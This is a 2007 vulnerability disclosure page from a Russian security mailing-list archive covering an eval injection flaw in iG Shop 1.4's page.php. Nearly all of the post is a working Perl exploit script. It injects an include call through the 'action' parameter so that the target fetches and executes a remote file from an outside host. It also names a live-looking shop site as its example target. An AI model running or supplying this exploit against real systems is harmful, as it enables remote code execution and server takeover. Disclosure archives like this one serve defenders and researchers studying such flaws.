Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  Persistent cross-site scripting in wordpress.com dashboard

  Local File Include Vulnerabilities in YaBB <= 2.1(all version)

  fusetalk SQL (autherror.
cfm)

From:ifx_(at)_cupu.us <ifx_(at)_cupu.us>
Date:19 июня 2007 г.
Subject:iG Shop 1.4 eval Inclusion Vulnerability

#!/usr/bin/perl -w
use LWP::UserAgent;
####################################################################
#iG Shop 1.4 eval Inclusion Vulnerability
#found by IFX #nyubicrew
#Vulnerability on page.php
#if (!$action)
#       $action = "make";
#// here the function will be called.
#eval ("page_$action();");
####################################################################
die "Example: perl $0 http://www.planetgolfuk.co.uk/shop\n" unless @ARGV;

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$url = $ARGV[0] . "/page.
php?action=|include(\$_GET\[cok\]);//phpinfo&cok=http://h
1.ripside.net/ifx/a.txt?
";

$res = $b->request(HTTP::Request->new(GET=>$url));
$respone = $res->content;

if ($respone =~ /nyelipin file ;P/i){
       print "\nTembus...\n";
       print "\n$url\n";
}
else{
print "\nGagal cok...\n";
}

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород